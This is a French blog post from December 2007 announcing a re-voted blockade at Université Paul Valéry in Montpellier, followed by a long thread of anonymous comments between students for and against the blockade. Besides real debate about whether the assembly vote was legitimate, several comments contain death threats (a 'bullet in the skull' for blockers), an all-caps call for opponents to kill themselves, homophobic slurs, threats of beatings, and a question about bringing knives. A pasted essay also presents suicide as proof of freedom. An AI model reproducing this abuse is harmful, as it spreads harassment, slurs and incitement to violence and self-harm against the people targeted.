Contacter le mouvement :


Contacter les gestionnaires du blog :
mouvement.montpellier@gmail.com



lundi 17 décembre 2007

Assemblée générale du 17 Décembre

Blocage revoté, mise en place dès demain matin.
Rendez-vous devant l'Université Paul Valéry à 07H30 demain.

Mardi 12H00 : Réunion du comité de mobilisation
Mercredi 10H00 : Assemblée de Mobilisation
Jeudi 09H00 : Assemblée Générale

896 commentaires:

«Les plus anciens   ‹Précédent   401 – 600 sur 896   Suivant›   Les plus récents»
Anonyme a dit…

mais enfin si tous les gens qui veulent aller en cours arrivent à des heure différence il n'y aura pas assez de monde face aux bloqueurs ! il faut s'organiser !

Anonyme a dit…

Pauvres âmes en pérdition, en mal de tout !!

Et bah moi j'aime un peu sissi l'impératrice mais surtout la petite sirène !!!!

Anonyme a dit…

si moi j'ai bien compris qui vous êtes:

des petites tappetes qui ouvrent leurs grandes gueules, qui croient connaitre la misère (vous marchez le ventre plein, vous dormez au chaud...), vous baissez les yeux devant 2 crs.

Vous vous prenez pour des tyson avec vos 50kg tout mouilles et 1m30 les bras levés

Anonyme a dit…

La seule solution ?


Une balle logée dans le crâne, et la facture de celle-ci envoyé aux familles des bloqueurs.


Prenons exemple sur les puissances qui montent, à savoir la Chine.

Anonyme a dit…

et toi tu prends pour qui avec tes "tout dans les muscles, rien dans la tête !"

Anonyme a dit…

gunn a dit:"Sérieux faut que TOUT LE MONDE je dis bien TOUT le monde se calme parce que sinon cela va finir en Live et comme a dit c la vie tous à l'hôpital !"

genre comme si tous le monde allait se taper sur la gueule (en tout cas moi j'ai autre chose à foutre)
arrêtez de vous exciter devant votre écran vous allez me faire de la tacchicardie..
allez un bon supo et au dodo..

Anonyme a dit…

alors demain au menu tartare de bloqueurs sauce crs

Anonyme a dit…

OK MICHEL !!

C'est vrai que vos AG c'est le summum de l'intelligence

Anonyme a dit…

une seule solution : LA SODOMISATIOOOON

Anonyme a dit…

Zizi Azian, j'ai un bon plan pour toi mais je pense que tu connais déjà le truc:

http://www.dailymotion.com/relevance/search/tecktonik/video/x2oflu_exclu-yelle-acdg-tepr-remix-alterna_music

Alors demain, tous les antibloqueurs avec des slims et des crêtes/nuqueslongues, et tous les bloqueurs avec des treillis kakis et des TShirts "je baiserai la France jusqu'à ce qu'elle m'aime"! Ce sera plus facile pour le compte des points...PENSEZ AUX JUGES DE TOUCHE!

Anonyme a dit…

Oui, opinion way, nous sommes des cons lobotomisés ! Voilà, tu as raison ! Inutile de vous occuper de nous, on est bien trop bêtes ! OK, laissez aller les moutons bêlants en cours maintenant, ca serait pas trop demander ?

P.S : Non, je n'ai aucun amour propre et l'auto-dérision est la dernière arme qui me reste pour faire face à vous, nos maîtres, qui décidez pour nous !

HALTE A L'OPPRESSION (pas tjs du côté qu'on croit)

Anonyme a dit…

jnik vos REUM moi

Anonyme a dit…

jsui contre le blocage, mais la je trouve que certain anti-bloqueurs vont un peu trop loin dans leurs propos..
calmos les gars (ou les geuz)..

Anonyme a dit…

En tant que membre du comité action, et représentant une bonne partie des "bloqueurs" nous trouvons ce vote encore plus illégitime que le vote de jeudi, alors j'apelle les bloqueurs à aller en cours et à informer!!!

C'est certains membres du mouvement qui ont décidés sa à 17h entre eux, alors que par exemple moi j'avais cours...

Une AG a 1500-2000 est légitime, pas à 150, surtout avec 88 voix pour, et 60 contre...

Anonyme a dit…

Maître Splinteur je te signale que ce n'est pas Gunn qui a dit ca c moi " j'aime les rrrrrr "
Donc avt de prendre ton supo apprend à lire ! MERDE !
On verra bien ce que je vous dis j'ai raison ca va finir en cacahuète

Anonyme a dit…

enfants de ruelles

Anonyme a dit…

Je réclame la présence de Jésus devant l'université demain pour qu'il décide lui même

Anonyme a dit…

à "mel" qui a dis qu'être anarchiste c'est une insulte? où t'as vu ça? ben non alors je ne sais pas pourquoi y'a des étudiants qui se plaignent qu'on les traîte d'anarchistes hé faut savoir hein et surtout assumer mais toi t'as l'air d'assumer ben tant mieux pour toi...
mais faut vous rendre à l'évidence c'est pas en bloquant la fac que vous changerez quoique ce soit, faut comprendre c'est le business qui compte pour le gvt sarko et si vous voulez changer les choses c'est aux élections présidentielles en 2012!!! ben oui n'oubliez pas que plus de 50% ont voté pour sarko hé oui malheureusement...

Anonyme a dit…

Light ov Astaroth a dit...

Pas la peine de faire semblant d'être un bloqueur pour essayer de mieux passer ton message compèr

Jpourrais très bien dire que jsuis le président et que tout le monde doit bloquer

Anonyme a dit…

Plutôt ok pour la présence de Jésus anonyme (à condition qu'il soit aussi classe que dans the Big Lebowski), sinon, je réclame également la présence de l'inventeur de la tecktonik qu'il prenne ses responsabilités une bonne fois pour toutes!

Anonyme a dit…

Et moi je veux le précurseur du curling.
J'veux un coupable.

Anonyme a dit…

sarkozy : elu par plus de la moitié des jeunes ... et ca se plaint ...

Anonyme a dit…

je vois que mtp3 ne filtre pas...

ANTIBLOQUEURS VOUS ETES DES FILS DE PUTE

VOUS ETES DES MOUTONS

SUICIDEZ VOUS

VOUS VOUS ETES JETE SUR VOS COURS COMME DES VRAIS MOUTONS

JAI HONTE D ETRE ASSIMILE A VOUS

BANDE DE PUCEAUX PUCELLES

Anonyme a dit…

eh j'aime les rrrrrrr, quelle répartie, ouaouu, jsui trés impressionné..
ton niveau d'intelligence est comme qui dirait inexistant..
allez sans rancunes du con la joie..mince alors j'ai dis un gros mot..(jtemmerde)
fais gaffe y a leonardo, michélangelo, raphaélo et donatell qui vont venir te lapider

Anonyme a dit…

Bonjour,
moi j'ai entendu dire par une personne qui était à l'AG que les personnes étaient peu nombreuses et que donc le blocage serait difficile à réaliser pour demain.Je souhaiterai juste savoir si ce blocage est sur parce que je n'habite pas à coté et c'est un peu bete de faire le trajet pour rien si on se fait bloquer à l'entrée de la fac.Merci

Anonyme a dit…

quoi de mieux qu'une bonne baston
entre skin

Anonyme a dit…

OK OK


moi aussi je peux faire des msg comme anonyme qui servent à rien
comme aussi de se taper dessus les uns les autres

Tintin1501 a dit…

Petit rappel pour ceux qui ne sont pas couchés et qui ont quand même envie de discuter en toute cordialité ...

http://mtp3lru.xooit.fr/

Cordialement.
Bonne nuit à tous.

Anonyme a dit…

babylon brule !!! l'etat nous assasine

Anonyme a dit…

elle est pas si pourrie la loi , enfin pas pour tous :) , moi elle me convient

Anonyme a dit…

Je suis gréviste, du moins je l'etais avantla reprise des cours, mais je suis décue par l'AG d'aujourd'hui. Une AG est légitime mais pas à à peine 150. Voter le blocage à 80 contre 67 c'est du suicide. Je ne vous suivrais pas demain, en tout cas, pas tant qu'il n'y aura pas une autre AG où nous serons plus. Le climat est tendu, cela ne me dit rien de bon. Mieux vaut faire des grosses actions autres que le blocage pendant un moment et le reprendre après les exams comme ca les esprits seront appaisés et il n'y aura plus de menace en l'air de semestre blanc etc... Ainsi il y aura surement plus d emobilisés. ET pr le boycott des exams, ben je pense que les courageux qui le feront seront sacrifiés pour rien parce qu'il n'y en aura que 50.
Agissons, mais agissons effficacement, pas en desespoir de cause.

Anonyme a dit…

quand la france du bas regle ses comptes , rigolo a lire tout ca en tous cas

Anonyme a dit…

A-Genou

Anonyme a dit…

De toute façon GUNN c juste une énorme tarlouze qui va pleurer dans les jupons de sa maman une fois que les crs lui auront botter ces ptites fesse de jeune fille.

Faut d couilles pour jeter des coktails et tirer avec une arme, tout ce que tu n'a pas espèce de blaireau. En plus ya que comme sa que tu te crois supérieur. C malin de vouloir jouer avec des armes alors qu'il y a des étudiants qui ne demandent qu'à étudier. Fais bien attention a pas de faire sauter une couille GUNN se serait bête que tu ne puisse pas faire plaisir à ton homme en rentrant.

Anonyme a dit…

BANDE DE GLANDEURS, JSPR QUE LES CRS VOUS DONNENT 1 BONNE LECON DEMAIN, CA VOUS FERAIT DU BIEN JE CROIS... Et oui on est allé en cours aujourdhui parce que NOUS on va a la fac pr VOIR COURS BANDE DE NAAAAAAAAAAAAAAAAAZ!!!!

Anonyme a dit…

Bien envoyé Kadinium

Anonyme a dit…

Jsuis sure que la prochaine AG si elle parle du destin de Lisa remplira plus de monde ds lamphi que celle d'aujourdhui :p

Anonyme a dit…

à Kadinium merci enfin un qui parle en connaissance de cause et de manière raisonnable et réflichie!
sur ce bonne à tous et @demain on verra bien ce qu'il en sera...

Anonyme a dit…

"réfléchie" bonne nuit peut être que la nuit va porter conseil :)

Anonyme a dit…

demain on veut voir des Bloqueur avec des bleu sur les fesses Po Po Po mobilisé vous allé vous faire tabassé sa vous feras des vacances comme vous en voulez

Anonyme a dit…

Franchement, moi je dit que tout ça sa craint! On prend les blokeurs pour des flemmards et des anarchistes alors qu'ils pensent tout simplement à leur avenir! Faut pas lacher, il ne faut vraiment pas lacher! Même si on voit que le gouvernement en n'a rien à faire de nous, je peu vous assurez qu'il y aura tôt ou tard des conséquences!

Anonyme a dit…

"Bien envoyé Kadinium"

pareil...

Anonyme a dit…

Tout ça me rappelle l'histoire du nain à qui on avait coupé les pieds...Il marchait sur ses moignons...

Anonyme a dit…

Maureen a quitté la starc ac???

Anonyme a dit…

Merci anonyme de 23:28 enfin qlq chose d'intelligent !!!!

Anonyme a dit…

oui tt a fait les conséquences c genre une génération d'abruti pour les annés universitaire suivante des gens qui ont raté leur master 2
On vous remerci !!

Anonyme a dit…

Je suis dépourvu de foi et ne puis donc être heureux, car un homme qui risque de craindre que sa vie soit une errance absurde vers une mort certaine ne peut être heureux. Je n’ai reçu en héritage ni dieu, ni point fixe sur la terre d’où je puisse attirer l’attention d’un dieu : on ne m’a pas non plus légué la fureur bien déguisée du sceptique, les ruses de Sioux du rationaliste ou la candeur ardente de l’athée. Je n’ose donc jeter la pierre ni à celle qui croit en des choses qui ne m’inspirent que le doute, ni à celui qui cultive son doute comme si celui-ci n’était pas, lui aussi, entouré de ténèbres. Cette pierre m’atteindrait moi-même car je suis bien certain d’une chose : le besoin de consolation que connaît l’être humain est impossible à rassasier.


En ce qui me concerne, je traque la consolation comme le chasseur traque le gibier. Partout où je crois l’apercevoir dans la forêt, je tire. Souvent je n’atteins que le vide mais, une fois de temps en temps, une proie tombe à mes pieds. Et, comme je sais que la consolation ne dure que le temps d’un souffle de vent dans la cime d’un arbre, je me dépêche de m’emparer de ma victime.

Qu’ai-je alors entre mes bras ?


Puisque je suis solitaire : une femme aimée ou un compagnon de voyage malheureux. Puisque je suis poète : un arc de mots que je ressens de la joie et de l’effroi à bander. Puisque je suis prisonnier : un aperçu soudain de la liberté. Puisque je suis menacé par la mort : un animal vivant et bien chaud, un cœur qui bat de façon sarcastique. Puisque je suis menacé par la mer : un récif de granit bien dur.


Mais il y a aussi des consolations qui viennent à moi sans y être conviées et qui remplissent ma chambre de chuchotements odieux : Je suis ton plaisir – aime-les tous ! Je suis ton talent – fais-en aussi mauvais usage que de toi-même ! Je suis ton désir de jouissance – seuls vivent les gourmets ! Je suis ta solitude – méprise les hommes ! Je suis ton aspiration à la mort – alors tranche !


Le fil du rasoir est bien étroit. Je vois ma vie menacée par deux périls : par les bouches avides de la gourmandise, de l’autre par l’amertume de l’avarice qui se nourrit d’elle-même. Mais je tiens à refuser de choisir entre l’orgie et l’ascèse, même si je dois pour cela subir le supplice du gril de mes désirs. Pour moi, il ne suffit pas de savoir que, puisque nous ne sommes pas libres de nos actes, tout est excusable. Ce que je cherche, ce n’est pas une excuse à ma vie mais exactement le contraire d’une excuse : le pardon. L’idée me vient finalement que toute consolation ne prenant pas en compte ma liberté est trompeuse, qu’elle n’est que l’image réfléchie de mon désespoir. En effet, lorsque mon désespoir me dit : Perds confiance, car chaque jour n’est qu’une trêve entre deux nuits, la fausse consolation me crie : Espère, car chaque nuit n’est qu’une trêve entre deux jours.


Mais l’humanité n’a que faire d’une consolation en forme de mot d’esprit : elle a besoin d’une consolation qui illumine. Et celui qui souhaite devenir mauvais, c’est-à-dire devenir un homme qui agisse comme si toutes les actions étaient défendables, doit au moins avoir la bonté de le remarquer lorsqu’il y parvient.


Personne ne peut énumérer tous les cas où la consolation est une nécessité. Personne ne sait quand tombera le crépuscule et la vie n’est pas un problème qui puisse être résolu en divisant la lumière par l’obscurité et les jours par les nuits, c’est un voyage imprévisible entre des lieux qui n’existent pas. Je peux, par exemple, marcher sur le rivage et ressentir tout à coup le défi effroyable que l’éternité lance à mon existence dans le mouvement perpétuel de la mer et dans la fuite perpétuelle du vent. Que devient alors le temps, si ce n’est une consolation pour le fait que rien de ce qui est humain ne dure – et quelle misérable consolation, qui n’enrichit que les Suisses !


Je peux rester assis devant un feu dans la pièce la moins exposée de toutes au danger et sentir soudain la mort me cerner. Elle se trouve dans le feu, dans tous les objets pointus qui m’entourent, dans le poids du toit et dans la masse des murs, elle se trouve dans l’eau, dans la neige, dans la chaleur et dans mon sang. Que devient alors le sentiment humain de sécurité si ce n’est une consolation pour le fait que la mort est ce qu’il y a de plus proche de la vie – et quelle misérable consolation, qui ne fait que nous rappeler ce qu’elle veut nous faire oublier !


Je peux remplir toutes mes pages blanches avec les plus belles combinaisons de mots que puisse imaginer mon cerveau. Etant donné que je cherche à m’assurer que ma vie n’est pas absurde et que je ne suis pas seul sur la terre, je rassemble tous ces mots en un livre et je l’offre au monde. En retour, celui-ci me donne la richesse, la gloire et le silence. Mais que puis-je bien faire de cet argent et quel plaisir puis-je prendre à contribuer au progrès de la littérature – je ne désire que ce que je n’aurai pas : confirmation de ce que mes mots ont touché le cœur du monde. Que devient alors mon talent si ce n’est une consolation pour le fait que je suis seul – mais quelle épouvantable consolation, qui me fait simplement ressentir ma solitude cinq fois plus fort !


Je peux voir la liberté incarnée dans un animal qui traverse rapidement une clairière et entendre une voix qui chuchote : Vis simplement, prends ce que tu désires et n’aie pas peur des lois ! Mais qu’est-ce que ce bon conseil si ce n’est une consolation pour le fait que la liberté n’existe pas – et quelle impitoyable consolation pour celui qui s’avise que l’être humain doit mettre des millions d’années à devenir un lézard !


Pour finir, je peux m’apercevoir que cette terre est une fosse commune dans laquelle le roi Salomon, Ophélie et Himmler reposent côte à côte. Je peux en conclure que le bourreau et la malheureuse jouissent de la même mort que le sage, et que la mort peut nous faire l’effet d’une consolation pour une vie manquée. Mais quelle atroce consolation pour celui qui voudrait voir dans la vie une consolation pour la mort !


Je ne possède pas de philosophie dans laquelle je puisse me mouvoir comme le poisson dans l’eau ou l’oiseau dans le ciel. Tout ce que je possède est un duel, et ce duel se livre à chaque minute de ma vie entre les fausses consolations, qui ne font qu’accroître mon impuissance et rendre plus profond mon désespoir, et les vraies, qui me mènent vers une libération temporaire. Je devrais peut-être dire : la vraie car, à la vérité, il n’existe pour moi qu’une seule consolation qui soit réelle, celle qui me dit que je suis un homme libre, un individu inviolable, un être souverain à l’intérieur de ses limites.


Mais la liberté commence par l’esclavage et la souveraineté par la dépendance. Le signe le plus certain de ma servitude est ma peur de vivre. Le signe définitif de ma liberté est le fait que ma peur laisse la place à la joie tranquille de l’indépendance. On dirait que j’ai besoin de la dépendance pour pouvoir finalement connaître la consolation d’être un homme libre, et c’est certainement vrai. A la lumière de mes actes, je m’aperçois que toute ma vie semble n’avoir eu pour but que de faire mon propre malheur. Ce qui devrait m’apporter la liberté m’apporte l’esclavage et les pierres en guise de pain.


Les autres hommes ont d’autres maîtres. En ce qui me concerne, mon talent me rend esclave au point de pas oser l’employer, de peur de l’avoir perdu. De plus, je suis tellement esclave de mon nom que j’ose à peine écrire une ligne, de peur de lui nuire. Et, lorsque la dépression arrive finalement, je suis aussi son esclave. Mon plus grand désir est de la retenir, mon plus grand plaisir est de sentir que tout ce que je valais résidait dans ce que je crois avoir perdu : la capacité de créer de la beauté à partir de mon désespoir, de mon dégoût et de mes faiblesses. Avec une joie amère, je désire voir mes maisons tomber en ruine et me voir moi-même enseveli sous la neige de l’oubli. Mais la dépression est une poupée russe et, dans la dernière poupée, se trouvent un couteau, une lame de rasoir, un poison, une eau profonde et un saut dans un grand trou. Je finis par devenir l’esclave de tous ces instruments de mort. Ils me suivent comme des chiens, à moins que le chien, ce ne soit moi. Et il me semble comprendre que le suicide est la seule preuve de la liberté humaine.


Mais, venant d’une direction que je ne soupçonne pas encore, voici que s’approche le miracle de la libération. Cela peut se produire sur le rivage, et la même éternité qui, tout à l’heure, suscitait mon effroi est maintenant le témoin de mon accession à la liberté. En quoi consiste donc ce miracle ? Tout simplement dans la découverte soudaine que personne, aucune puissance, aucun être humain, n’a le droit d’énoncer envers moi des exigences telles que mon désir de vivre vienne à s’étioler. Car si ce désir n’existe pas, qu’est-ce qui peut alors exister ?


Puisque je suis au bord de la mer, je peux apprendre de la mer. Personne n’a le droit d’exiger de la mer qu’elle porte tous les bateaux, ou du vent qu’il gonfle perpétuellement toutes les voiles. De même, personne n’a le droit d’exiger de moi que ma vie consiste à être prisonnier de certaines fonctions. Pour moi, ce n’est pas le devoir avant tout mais : la vie avant tout. Tout comme les autres hommes, je dois avoir droit à des moments où je puisse faire un pas de côté et sentir que je ne suis pas seulement une partie de cette masse que l’on appelle la population du globe, mais aussi une unité autonome.


Ce n’est qu’en un tel instant que je peux être libre vis-à-vis de tous les faits de la vie qui, auparavant, ont causé mon désespoir. Je peux reconnaître que la mer et le vent ne manqueront pas de me survivre et que l’éternité se soucie peu de moi. Mais qui me demande de me soucier de l’éternité ? Ma vie n’est courte que si je la place sur le billot du temps. Les possibilités de ma vie ne sont limitées que si je compte le nombre de mots ou le nombre de livres auxquels j’aurai le temps de donner le jour avant de mourir. Mais qui me demande de compter ? Le temps n’est pas l’étalon qui convient à la vie. Au fond, le temps est un instrument de mesure sans valeur car il n’atteint que les ouvrages avancés de ma vie.


Mais tout ce qui m’arrive d’important et tout ce qui donne à ma vie son merveilleux contenu : la rencontre avec un être aimé, une caresse sur la peau, une aide au moment critique, le spectacle du clair de lune, une promenade en mer à la voile, la joie que l’on donne à un enfant, le frisson devant la beauté, tout cela se déroule totalement en dehors du temps. Car peu importe que je rencontre la beauté l’espace d’une seconde ou l’espace de cent ans. Non seulement la félicité se situe en marge du temps mais elle nie toute relation entre celui-ci et la vie.


Je soulève donc de mes épaules le fardeau du temps et, par la même occasion, celui des performances que l’on exige de moi. Ma vie n’est pas quelque chose que l’on doive mesurer. Ni le saut du cabri ni le lever du soleil ne sont des performances. Une vie humaine n’est pas non plus une performance, mais quelque chose qui grandit et cherche à atteindre la perfection. Et ce qui est parfait n’accomplit pas de performance : ce qui est parfait œuvre en état de repos. Il est absurde de prétendre que la mer soit faite pour porter des armadas et des dauphins. Certes, elle le fait – mais en conservant sa liberté. Il est également absurde de prétendre que l’homme soit fait pour autre chose que pour vivre. Certes, il approvisionne des machines et il écrit des livres, mais il pourrait tout aussi bien faire autre chose. L’important est qu’il fasse ce qu’il fait en toute liberté et en pleine conscience de ce que, comme tout autre détail de la création, il est une fin en soi. Il repose en lui-même comme une pierre sur le sable.


Je peux même m’affranchir du pouvoir de la mort. Il est vrai que je ne peux me libérer de l’idée que la mort marche sur mes talons et encore moins nier sa réalité. Mais je peux réduire à néant la menace qu’elle constitue en me dispensant d’accrocher ma vie à des points d’appui aussi précaires que le temps et la gloire.


Par contre, il n’est pas en mon pouvoir de rester perpétuellement tourné vers la mer et de comparer sa liberté avec la mienne. Le moment arrivera où je devrai me retourner vers la terre et faire face aux organisateurs de l’oppression dont je suis victime. Ce que je serai alors contraint de reconnaître, c’est que l’homme a donné à sa vie des formes qui, au moins en apparence, sont plus fortes que lui. Même avec ma liberté toute récente je ne puis les briser, je ne puis que soupirer sous leur poids. Par contre, parmi les exigences qui pèsent sur l’homme, je peux voir lesquelles sont absurdes et lesquelles sont inéluctables. Selon moi, une sorte de liberté est perdue pour toujours ou pour longtemps. C’est la liberté qui vient de la capacité de posséder son propre élément. Le poisson possède le sien, de même que l’oiseau et que l’animal terrestre. Thoreau avait encore la forêt de Walden – mais où est maintenant la forêt où l’être humain puisse prouver qu’il est possible de vivre en liberté en dehors des formes figées de la société ?


Je suis obligé de répondre : nulle part. Si je veux vivre libre, il faut pour l’instant que je le fasse à l’intérieur de ces formes. Le monde est donc plus fort que moi. A son pouvoir je n’ai rien à opposer que moi-même – mais, d’un autre côté, c’est considérable. Car, tant que je ne me laisse pas écraser par le nombre, je suis moi aussi une puissance. Et mon pouvoir est redoutable tant que je puis opposer la force de mes mots à celle du monde, car celui qui construit des prisons s’exprime moins bien que celui qui bâtit la liberté. Mais ma puissance ne connaîtra plus de bornes le jour où je n’aurai plus que le silence pour défendre mon inviolabilité, car aucune hache ne peut avoir de prise sur le silence vivant.


Telle est ma seule consolation. Je sais que les rechutes dans le désespoir seront nombreuses et profondes, mais le souvenir du miracle de la libération me porte comme une aile vers un but qui me donne le vertige : une consolation qui soit plus qu’une consolation et plus grande qu’une philosophie, c’est-à-dire une raison de vivre.


++

Anonyme a dit…

"Je suis gréviste, du moins je l'etais avantla reprise des cours, mais je suis décue par l'AG d'aujourd'hui. Une AG est légitime mais pas à à peine 150. Voter le blocage à 80 contre 67 c'est du suicide. Je ne vous suivrais pas demain, en tout cas, pas tant qu'il n'y aura pas une autre AG où nous serons plus. Le climat est tendu, cela ne me dit rien de bon. Mieux vaut faire des grosses actions autres que le blocage pendant un moment et le reprendre après les exams comme ca les esprits seront appaisés et il n'y aura plus de menace en l'air de semestre blanc etc... Ainsi il y aura surement plus d emobilisés. ET pr le boycott des exams, ben je pense que les courageux qui le feront seront sacrifiés pour rien parce qu'il n'y en aura que 50.
Agissons, mais agissons effficacement, pas en desespoir de cause."





lol putain quel mythos tous ces ex grévistes repentis. LMAO
Vous me faites bien marrer.

Votre 80 vous décridibilise bande de nazes.
On était 400 au moment du vote.


Vou l'avez dans le cul anti-bloqueurs.

Soit on bloque et il y pas cours soit les CRS interviennent, la fac ferme ey y a pas cours.

Anonyme a dit…

""Bien envoyé Kadinium"

pareil..."
euh, c'un mytho ce Kadinium. Vous etes vraiment cons les anti-bloqueurs.

Anonyme a dit…

pardon mais j'y étais aussi et le résultat du vote est de 80 contre 67 ce qui fait a peu près 150 personnes ou allez maxi 200. Je suis partante pr cette action mais je dis juste qu'a si peu d emonde c pas legitime. Faut qu'on soit plus. c'est tout

Anonyme a dit…

Mai franchement vous savez au moins pk vous bloquez encore la? Parce que a voir vos commentaires style: "ds le cul les bloquers, soit on nous laisse bloquer soit il y a les crs et fermeture administrative" Mais la seule chose que vous voulez c de nous faire chier ou quoi???!!!! Bande de glandeurs, on est pas tous comme vous qui ont les tunes pr payer 1 année redoublée, on a lintention de réussir ds la vie et pr ca, et oui faudra bien étudier 1 jour... mais ca vous ne coprennez pas biensur...

Anonyme a dit…

Ma fac va crack-er

Anonyme a dit…

LIBERATION DES NAINS DE JARDIN!!!!!!!!

Anonyme a dit…

Ah oui et ne venez pas me dire: "oui mais ac l'lru nos enfants ne pourrons pas étudier blabla..." Bah oui jveux bien mais c pas ac 1 blocage minable de 100 personnes qui sont vus comme des glandeurs (et c tt ce que vous etes pr linstant) que qcc va changer!!! Vous n'etes plus crédibles, c tout ce que vous ayez ac cette action bidon!!!
Vous me donnerez 1 adress pr vous envoyer la facture de lannée redoublée hein?

Anonyme a dit…

"pardon mais j'y étais aussi et le résultat du vote est de 80 contre 67"

arrete ton mytho

Anonyme a dit…

Allons dans le compromis comme a PAris-8.

Bloquons uniquement les CM en amphi... Et organisont des cours de remplacement !!

DF

Anonyme a dit…

Félicitations aux bloqueurs qui montrent enfin leur vrai visage, celui de la violence gratuite et de l'emmerdement des gens pour rien. J'ai honte d'être étudiant, quand ce mot est utilisé pour désigner des déchets comme vous. Vous croyez nous baiser ? Mais c'est la vie qui vous baisera, quand vous aurez des boulots minables parce que vous aurez foutu vos études en l'air... Vous votez des blocages dans le dos des gens, mais comment osez-vous vous montrer en public, je crèverais de honte à votre place... Vous vous plaignez d'un gouvernement autoritaire, mais s'il l'était un minimum votre mouvement aurait été éradiqué depuis belle lurette... Mûrissez, franchement, ça vaudra mieux pour tout le monde...

Anonyme a dit…

MOI J AIMERAIS QUE QUELQU UN ME DISE SI ON PEUT ETRE BLOQUEUR ET DANSER LA TECKTONIK. VOILA C TOUT

Anonyme a dit…

anti poisson nier franchement c'est pas gentil ce que tu me dis , je suis pas anti blocage ni anti bloqueuse, j'etais quasiment tous les jours aux piquets de grèves quand on bloquait la fac, j'essais d'aller en manif, alors stp ne me traite ^pas d'antibloqueuse parce que je suis ds l'autre camp.
Je dis juste que là on est mal et là on devrait réfléchir deux secondes de plus et à la prochaine AG en redebattre et dire ds les tracts que le point du blocage sera abordé, juste pr faire venir du monde. Comme ca on pourra par la mm occas parler du fond de nos actions. C'est simple, les gens viennnent que quand il est question de fermer l'accès aux cours. Sinon, ils s'en foutent. C'est triste mais c'est comme ca pr la plupart des gens, alors parlons de ce qui les interressent et au moins si on revote le blocage, on sera plus et donc p^lus legitime

Anonyme a dit…

peace and love

Anonyme a dit…

Youhouhou !
Ca va chauffer demain ^^

Anonyme a dit…

bloqueur de mon état, j'attends tous ces anti-bloqueurs qui croient que demain, ils pourront assister tranquilement à leur cours!!!
Le combat n'est pas fini on lâchera rien!

Anonyme a dit…

bonne vacance de noel mes amis :)

Anonyme a dit…

'' mon ex à toujours été petit dans sa façon d'être''

Anonyme a dit…

Alors moi je dis à tous :
Joyeux noel
Bonne année
et surtout Joyeuses pâques !!!

Anonyme a dit…

Wééé le combat contre les méchants anti-blocage n'est aps encore fini!!! Mais vous vous écoutez 1 peu? J'ai jamais vu autant de naz que les bloquers qui marquent des commentaires comme ca franchement...

Anonyme a dit…

tant pis, pas de cadeau cette année :)

Anonyme a dit…

Tecktonik killer
Non on ne peut pas être blokeur é tektonikeur
tektonik tudanse sur e lelectro musik faite a partir de machine machine ki représente el capitalisme!C mort pr toi
Meme si létoile du tektonikeur pouré passé pr une étoile comuniste je doute ke staline oré aimé le rose é ns devon respecté sa façon de voir les choses!

Anonyme a dit…

Tout à fait d'accord avec kadinium
meme moi j'aurais pas dis mieux

Anonyme a dit…

Camarade,
je suis impliké ds le mvt et cela me semble tres important de poursuivre la lutte..Si il le faut je poursuivrai ce combat jusqu'en fevrier !! Notre AG était completement democratique ds le sens ou les plus intelligent se sont exprimé,ns representons l'élite donc suivez ns,faites ns confiance..
Demain c'est le blokage un point c tout :)

Anonyme a dit…

Franchement ca deviens n'importe quoi.
C'est vraiment bloquer pour bloquer. Si vous ne savez pas quoi faire de vos journées trouver une autre occupation. Si vous avez une frustration quelconque ou tout autre probleme de puissance et que vous essayez de palier avec des blocages ca ne regarde que vous.
Cependant le blocage a ete refusé par 80% des etudiants votant (plus de 3.000). Ce vote a ete tronqué en quoi? chacun a fait son vote comme il le voulais.
Votre AG s'est tenue aujourd'hui alors que tout le monde etait en cours. Ou cela etait il annoncé pour que le plus grand nombre en ait connaissance? c'est sur que voter un blocage a 50 dans son coin alors que tout le monde est en cours c'est plus ligitime. Ne faut il pas aussi annoncer une AG au minimum 24h a l'avance? Car comme c'etait le we ca fait juste le timing.
Quoi qu'il en soit votre blocage ne rime a rien. Et arretez de menacez (je ne généralise pas) vous ne faites que vous enfoncer un peu plus

Et pourquoi tant de message supprimé? ca censure severement aussi ici.

A demain en cours.

Anonyme a dit…

"Notre besoin de consolation est impossible 17 décembre 2007 23:33"
la con de ta mere ta CRU que l'on allait lire ton commentaire PLUS LONG LA PROCHAINE FOI enfant d'accident

Anonyme a dit…

N'empêche que vous êtes tous des grandes gueules !!!
Bloqué Bloqué Bloqué
ceux qui ont eu le plus niaque dans ce mvt c les étudiants qui sont à jours dans eur grève de la faim à mtp 2

Anonyme a dit…

Faut arreter à un moment, c'est bien de faire des manifs mais voila si c est pour que ça finisse en baston avec des blessés bah franchement ca vaut pas le coup ! Il en a rien a foutre sarko de notre gueule: le pouvoir, le pouvoir et rien d 'autres ..ah si augmenter son salaire j oubliais !! Alors au lieu de se faire la guerre, autant se s'associer soit on va en cours comme de gentils étudiants soucieux de leur avenir soit on renverse le gouvernement ... 5ans c'est pas rien !! Alors ?

Anonyme a dit…

tout à fait en accord avec Cedric pour que nous vaut cette censure des comentaire..il semble que vous ne vous genez pas pour venir nous delogé en cours et bloquer la fac à l'insu d'un groupe majoritaire

Anonyme a dit…

Bonsoir, j'étais à l'AG tout à l'heure et je voudrais savoir si il y a une infime chance pour que les 83( il me semble) personnes qui ont levé la main soient là demain matin à 7h30 pour bloquer... J'ai trés peur que ce ne soit pas le cas et on va passer pour des petits cons, et c'est comme ça que tout ça va finir.
J'trouve ça dommage qu'on ai pas voté les autres "formes" de blocage qui ont été proposées. Toutes ces revendications... on s'en sortira jamais si on se concentre pas que sur ce qui nous touche en tant qu'étudiants ( LRU etc etc rapellez vous)!! c'est clair qu'on doit se battre pour le reste en tant que citoyens, qu'humains (comme ça a été dit en AG), mais dans ce cas faut s'inscrire dans des associations et agir autrement si ça vous tient tant à coeur. Je sais pas si, aprés cette AG trés dispersée, je vais continuer à soutenir le mouvement qui ne sait plus trop où il va et que certains ont fini par s'approprier...

Anonyme a dit…

Airwaves:

On renverse, ca peut etre sympatoche =)

Anonyme a dit…

Sarko il lâche rien tout comme vous!!!

Anonyme a dit…

bande de gay

Anonyme a dit…

En votant ce bloquage aussi illegitimement que le débloquage l'a été fait auparavant dans une parodie de vote à bulletin secret (presence de la bac, flics, garde mobile,rg). Vous montrez votre vrai visage: des lamentables cons violant ce qu'ils pronent, des communistes frustrés qui auraient du vivre il y a exactement 80 ans en urss. Par ce vote vous atisez la haine et divisez plus que jamais les etudiants. Je croyais qu'il etait question d'action contre le lru. Il en decoule en réalité un immobilisme de l'eternelle alternance bloquage/debloquage/fermeture administrative, un pas en avant deux pas en arriere c'est la politique des etudiants. On aurait pu faire de grandes choses si y avait moins de cons dans les 2 camps. Allez vous faire foutre

Anonyme a dit…

Salut les copains!
Bloque ma fac et j'te débloque la face !
Les armes blanches sont elles autorisées demain matin ?
